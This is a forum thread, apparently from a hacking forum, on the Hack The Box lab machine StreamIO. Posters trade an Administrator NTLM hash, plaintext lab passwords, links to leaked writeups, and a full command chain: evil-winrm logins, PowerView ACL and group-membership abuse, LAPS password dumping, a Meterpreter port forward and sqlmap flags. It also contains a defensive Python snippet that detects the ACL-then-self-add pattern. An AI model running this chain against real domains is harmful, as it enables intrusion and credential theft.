StreamIO - HTB [Discussion]
(June 8, 2022, 02:20 AM)yumi Wrote:
(June 7, 2022, 03:00 AM)NoobHTB Wrote:
(June 7, 2022, 02:27 AM)Himitsu Wrote: Little gift:


HTB: StreamIO – Syn's writeups (synisl33t.com) 
What is the password of this writeup? I tried, but it doesn't work
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ef1f7fc4ac34eb666ad61bee4fd816:::



Try again worked now

Thanks for letting me know
Reply
Where is the root.txt?
Reply
(June 7, 2022, 03:39 PM)pentiumgold Wrote: Someone please elaborate on the initial foothold. How to find the user `yoshihide`. In my case sqlmap shows 404 because of http2


You need to add the --force-ssl flag to sqlmap.
Reply
(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.


How did you get the backup streamio database?
Reply
I can't get bloodhound working... does anyone have the content that it shows for the attack vector??
Reply
(June 6, 2022, 04:07 PM)GatoGamer1155 Wrote: In summary

Download powerview.ps1 module to local computer
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1


Connection to nikk37 with evil-winrm
evil-winrm -i streamio.htb -u nikk37 -p '[email protected]'


Upload and import module to the victim machine
upload PowerView.ps1

Import-Module .\PowerView.ps1


Add to JDgodd to get access with laps
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"

Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred


On local computer download and run lapsdumper
wget https://raw.githubusercontent.com/n00py/LAPSDumper/main/laps.py

python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb


[***laps doesn't work????***]

With the password that results connect with evil-winrm as administrator
evil-winrm -i streamio.htb -u Administrator -p '{passlaps.py}'



(June 6, 2022, 06:47 PM)Exa Wrote:
(June 6, 2022, 06:15 PM)fironeDerbert Wrote: How to do the port forwarding to 1433 step by step ?


I used Meterpreter:
portfwd add -l 1433 -p 1433 -r 127.0.0.1


Can you help me there****
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
Reply
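
Seen from the defender's side, the ACL change followed by the group self-add in the steps quoted above leaves a recognisable pair of domain controller events. The following is an added example, not part of any post in this thread, that correlates them; the event records, DNs and timestamps are constructed, and it assumes Directory Service Changes auditing is enabled and that a user's CN equals its account name.

```python
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security events from a DC.
# Field names follow events 5136 and 4728; DNs, times and 'svc_backup' are made up.
EVENTS = [
    {"EventID": 5136, "Time": "2022-06-06T16:01:10", "SubjectUserName": "JDgodd",
     "ObjectDN": "CN=Core Staff,CN=Users,DC=streamio,DC=htb", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4728, "Time": "2022-06-06T16:01:25", "SubjectUserName": "JDgodd",
     "TargetUserName": "Core Staff",
     "MemberName": "CN=JDgodd,CN=Users,DC=streamio,DC=htb"},
    {"EventID": 4728, "Time": "2022-06-06T17:30:00", "SubjectUserName": "Administrator",
     "TargetUserName": "Core Staff",
     "MemberName": "CN=svc_backup,CN=Users,DC=streamio,DC=htb"},
]

# Member-added events: global (4728), domain-local (4732), universal (4756) groups.
MEMBER_ADDED = {4728, 4732, 4756}

def first_rdn(dn):
    """Leftmost RDN value, e.g. 'Core Staff' (assumes no escaped commas in it)."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def find_acl_then_self_add(events, window=timedelta(minutes=10)):
    """Flag accounts that rewrite a group's DACL and then add themselves to it."""
    dacl_writes = {}  # (actor, group) -> time of the latest DACL change
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        actor = ev["SubjectUserName"].lower()
        if (ev["EventID"] == 5136 and ev.get("ObjectClass") == "group"
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            dacl_writes[(actor, first_rdn(ev["ObjectDN"]).lower())] = when
        elif ev["EventID"] in MEMBER_ADDED:
            member = first_rdn(ev["MemberName"]).lower()
            changed = dacl_writes.get((actor, ev["TargetUserName"].lower()))
            # Self-add shortly after the same account changed the group's ACL.
            if member == actor and changed and when - changed <= window:
                alerts.append({"account": ev["SubjectUserName"],
                               "group": ev["TargetUserName"],
                               "seconds_between": int((when - changed).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_acl_then_self_add(EVENTS):
        print(alert)
```

The Administrator adding another account to the group is not flagged, because no DACL change by the same actor precedes it.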
Finally, after 2 days... Thank you guys for your support. ❣️
Reply
If anyone needs help on this machine:

https://hack-the-flag.herokuapp.com/machines/474

Enjoy !
Reply
(June 7, 2022, 03:39 PM)pentiumgold Wrote: Someone please elaborate on the initial foothold. How to find the user `yoshihide`. In my case sqlmap shows 404 because of http2


If you use sqlmap with the -v6 flag, you will see that it is trying to connect to port 80; use the --force-ssl option to fix it.
Reply
Here is an unlocked writeup for you guys, hope you enjoy it!!!

Link : https://anonfiles.com/Kfj9s91cy9
Reply

